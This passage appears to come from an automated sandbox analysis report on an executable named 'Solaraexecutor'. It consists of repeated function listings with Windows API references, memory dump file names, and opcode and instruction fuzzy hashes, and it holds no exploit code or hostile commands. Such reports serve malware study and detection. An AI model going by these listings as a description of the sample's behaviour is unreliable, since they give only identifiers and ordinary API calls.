                                                      • Opcode Fuzzy Hash: feff71b556bd4259cd5d1be698ffea5c2242dd073fa0606480434913cdb5bf26
                                                      • Instruction Fuzzy Hash: 53318B758042599FCF15DF68D851AEEBBB4EF19304F1444AEE809B3282D735AE04CB71
                                                      APIs
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00D4ACF8
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AddressProc
                                                      • String ID:
                                                      • API String ID: 190572456-0
                                                      • Opcode ID: 08ce03306a651a3e16378ad809f6c3547fc2d8ee82f0be43abb44c27338ded66
                                                      • Instruction ID: 4f5174dacb97551219569cee61be21dcb3e1ce71e5b76fdbc344be01d2642186
                                                      • Opcode Fuzzy Hash: 08ce03306a651a3e16378ad809f6c3547fc2d8ee82f0be43abb44c27338ded66
                                                      • Instruction Fuzzy Hash: EE11C637A407259F9B269F2DEC8099A7395EB8436171E4220FD55EB394E730DD0187F2
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: H_prolog
                                                      • String ID:
                                                      • API String ID: 3519838083-0
                                                      • Opcode ID: ed721474ac8aa5e57feac8383d174234495fb5b350e8dfe10565829d131888c9
                                                      • Instruction ID: 83badebf4532d267fe9bd2c01ac06bf4b2b0289e0ee5c0eca86342d961db4480
                                                      • Opcode Fuzzy Hash: ed721474ac8aa5e57feac8383d174234495fb5b350e8dfe10565829d131888c9
                                                      • Instruction Fuzzy Hash: FD018633900534EBCF16ABA8DC519DEB732FFA8758F054125E815B7151DA34CD0486B0
                                                      APIs
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00D43C3F
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AddressProc
                                                      • String ID:
                                                      • API String ID: 190572456-0
                                                      • Opcode ID: 48c0ac721584198e47b6cb82780c2cc1409fe2c0045df77174090b1a735ec4b8
                                                      • Instruction ID: 21e622057c9da97992f3608136ebd951f7b86e8df964b6909f8e20b4a8ca4e57
                                                      • Opcode Fuzzy Hash: 48c0ac721584198e47b6cb82780c2cc1409fe2c0045df77174090b1a735ec4b8
                                                      • Instruction Fuzzy Hash: 19F0E5362003269FCF118EACEC40A9A77A9EF01B617184124FE15E71D0DB31EA20C7F0
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D4CA2C,00000000,?,00D46CBE,?,00000008,?,00D491E0,?,?,?), ref: 00D48E38
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 713c8d6ab7d05ff8547d74d48eac37d1ab23224f76bebd700fbb29eb21264d2e
                                                      • Instruction ID: 554939ba4e6137128822efd90df006404193cff9d03d306fb5aedbdccf40a582
                                                      • Opcode Fuzzy Hash: 713c8d6ab7d05ff8547d74d48eac37d1ab23224f76bebd700fbb29eb21264d2e
                                                      • Instruction Fuzzy Hash: ECE06D3120622557EA7126669C05B9FB648DF41BF8F190131BC59A6191DF22CC00A2F1
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 00D25AC2
                                                        • Part of subcall function 00D2B505: __EH_prolog.LIBCMT ref: 00D2B50A
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: H_prolog
                                                      • String ID:
                                                      • API String ID: 3519838083-0
                                                      • Opcode ID: b415e8f8bdc562cc2a7ba34c58046af221215fa5425843f0cfc965a5761f0327
                                                      • Instruction ID: ec8a1a0a162f9a6712d5410856341f3aa721bd7c4f77743bff613e9626b0bcec
                                                      • Opcode Fuzzy Hash: b415e8f8bdc562cc2a7ba34c58046af221215fa5425843f0cfc965a5761f0327
                                                      • Instruction Fuzzy Hash: 3E013130511694DBD715E7B8D0567DEFBA8DF64304F54448DA45653282CBB41B08DBB2
                                                      APIs
                                                        • Part of subcall function 00D2A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00D2A592,000000FF,?,?), ref: 00D2A6C4
                                                        • Part of subcall function 00D2A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00D2A592,000000FF,?,?), ref: 00D2A6F2
                                                        • Part of subcall function 00D2A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00D2A592,000000FF,?,?), ref: 00D2A6FE
                                                      • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00D2A598
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: Find$FileFirst$CloseErrorLast
                                                      • String ID:
                                                      • API String ID: 1464966427-0
                                                      • Opcode ID: be4d994f40579d93f1f2dc28cb15cb1464445eb2720f775b3fc4e1ebd234e017
                                                      • Instruction ID: 7609f543b46382982da34d3fdc156bbb107c855addd73b5d055cab98f4066866
                                                      • Opcode Fuzzy Hash: be4d994f40579d93f1f2dc28cb15cb1464445eb2720f775b3fc4e1ebd234e017
                                                      • Instruction Fuzzy Hash: 8DF089310087A0ABCB2257BC59057CB7B91DF35335F058A49F5FD52196C37550949B33
                                                      APIs
                                                      • SetThreadExecutionState.KERNEL32(00000001), ref: 00D30E3D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: ExecutionStateThread
                                                      • String ID:
                                                      • API String ID: 2211380416-0
                                                      • Opcode ID: 029a69479b0a7b33d084c637c8662a957dc4579964b92cab8de8e241abb9b6c6
                                                      • Instruction ID: 92916b549c2450f7df3f52cbb0005f5aa21b4a5d025735f3733be3b0b05ccee7
                                                      • Opcode Fuzzy Hash: 029a69479b0a7b33d084c637c8662a957dc4579964b92cab8de8e241abb9b6c6
                                                      • Instruction Fuzzy Hash: A4D02B1570136516DF11332838257FE2D0ACFE7351F0C0065F045A73C3CE444886B271
                                                      APIs
                                                      • GdipAlloc.GDIPLUS(00000010), ref: 00D3A62C
                                                        • Part of subcall function 00D3A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00D3A3DA
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: Gdip$AllocBitmapCreateFromStream
                                                      • String ID:
                                                      • API String ID: 1915507550-0
                                                      • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                      • Instruction ID: bd969f6272fe295b5e7c860f2a7db858deda408cf34a19ea832554a23fc2318a
                                                      • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                      • Instruction Fuzzy Hash: 5ED0C97131460ABADF426B698C13A6EBA99EB01340F048136B8C2D5191EAB1DD10A672
                                                      APIs
                                                      • DloadProtectSection.DELAYIMP ref: 00D3E5E3
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: DloadProtectSection
                                                      • String ID:
                                                      • API String ID: 2203082970-0
                                                      • Opcode ID: 18c42d85f9113f95ccf5fbc642aeb68c7a658a26f36b077a3c243dadaa3d08fa
                                                      • Instruction ID: 3c44c493569bbdfc42e38c22471c739d749d98f07520ac43ee5e66462d8d73ac
                                                      • Opcode Fuzzy Hash: 18c42d85f9113f95ccf5fbc642aeb68c7a658a26f36b077a3c243dadaa3d08fa
                                                      • Instruction Fuzzy Hash: 1AD0C9B85903809BD602EBA9E8467947358B364705FD80501B145D16D5DB6484CA8735
                                                      APIs
                                                      • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00D31B3E), ref: 00D3DD92
                                                        • Part of subcall function 00D3B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D3B579
                                                        • Part of subcall function 00D3B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D3B58A
                                                        • Part of subcall function 00D3B568: IsDialogMessageW.USER32(00010424,?), ref: 00D3B59E
                                                        • Part of subcall function 00D3B568: TranslateMessage.USER32(?), ref: 00D3B5AC
                                                        • Part of subcall function 00D3B568: DispatchMessageW.USER32(?), ref: 00D3B5B6
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                      • String ID:
                                                      • API String ID: 897784432-0
                                                      • Opcode ID: 70890bae784fb6297c632ed22e4997d38101b33a7db335a95d803b0bdb8ba5e8
                                                      • Instruction ID: 4e969d8161208f1d7280f72c34895e88a40c81410694678e45b627fe82bd1c4a
                                                      • Opcode Fuzzy Hash: 70890bae784fb6297c632ed22e4997d38101b33a7db335a95d803b0bdb8ba5e8
                                                      • Instruction Fuzzy Hash: 78D09E31154300BAD6012B51CD06F0B7AA2EB88F04F004555B384740B1CAB2AD31EB36
                                                      APIs
                                                      • GetFileType.KERNELBASE(000000FF,00D297BE), ref: 00D298C8
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: FileType
                                                      • String ID:
                                                      • API String ID: 3081899298-0
                                                      • Opcode ID: d710f539f2bd08b9f1fdc3c9147e09c499e24505c7b9d198b14876d8efa01802
                                                      • Instruction ID: 9cb7aa54d810dfe661808575ec0f57536f8f22208eb1034de523ed797aa77c1f
                                                      • Opcode Fuzzy Hash: d710f539f2bd08b9f1fdc3c9147e09c499e24505c7b9d198b14876d8efa01802
                                                      • Instruction Fuzzy Hash: EDC01234400315858E344A34A854095F311AA637BABBC8795C028C50E1C323CC47EA31
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: e4c7d828bd0d7e06d3d84675787a07dd5f99db7ab7fd0f532714c2b11957c672
                                                      • Instruction ID: d48c89d16534a9ad5fb6cac5833d50abf44f17ab3a02e797a80436347a752319
                                                      • Opcode Fuzzy Hash: e4c7d828bd0d7e06d3d84675787a07dd5f99db7ab7fd0f532714c2b11957c672
                                                      • Instruction Fuzzy Hash: B3B012D5669300FC310461851C06C37030CC0C1F11730843EFC05C04C0F840EC080471
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: dc7114b8970e89d894826782d8cb00f09739ebd4747e52db52cc9d02f8095757
                                                      • Instruction ID: 4acc2cf80fa8ab9c662296692c70625ae68220084fc04960030a7a4ff84f8b4a
                                                      • Opcode Fuzzy Hash: dc7114b8970e89d894826782d8cb00f09739ebd4747e52db52cc9d02f8095757
                                                      • Instruction Fuzzy Hash: FCB012D1669300EC3104A2451C06C3B030CC0C1F11730C03EFC0DC02C0E840EC0C0571
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: ebd94c4f49800136ceaebbeb6f5b357341b2efd7370423fb855dc9ca74ab15cb
                                                      • Instruction ID: 0fe5508bb11ad3491acffc9161353c36781e5c5b08ddbeb500ddbe9648e1ae37
                                                      • Opcode Fuzzy Hash: ebd94c4f49800136ceaebbeb6f5b357341b2efd7370423fb855dc9ca74ab15cb
                                                      • Instruction Fuzzy Hash: C9B012D566D300EC3104A1891C06C37030CC0C0F11730403EFC09C01C0F840AC080671
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: d62e74fbac6f03b94f347433aaee44c169408860ddf966678a5b4cf8a594e13f
                                                      • Instruction ID: 4ce23211a36fd80e611dfc711504904ca038da1d0051c763762ee5f989e740f7
                                                      • Opcode Fuzzy Hash: d62e74fbac6f03b94f347433aaee44c169408860ddf966678a5b4cf8a594e13f
                                                      • Instruction Fuzzy Hash: 06B012E1669300EC3104E1451D06C37038CC0C0F11B30403EFC09C01C0EC40AD090571
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: b4718593652834b110e6df595d34bf34d8be23e608a174984dd2ba0cf2d672ab
                                                      • Instruction ID: 2824355e78ee1a6e43e61ca1dfb930318b6b56572def3863478b53080aaf931b
                                                      • Opcode Fuzzy Hash: b4718593652834b110e6df595d34bf34d8be23e608a174984dd2ba0cf2d672ab
                                                      • Instruction Fuzzy Hash: F2B012E166A340FC3148A2455C06C37030DC0C0F11B30413EFC09C01C0E840AC4C0671
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
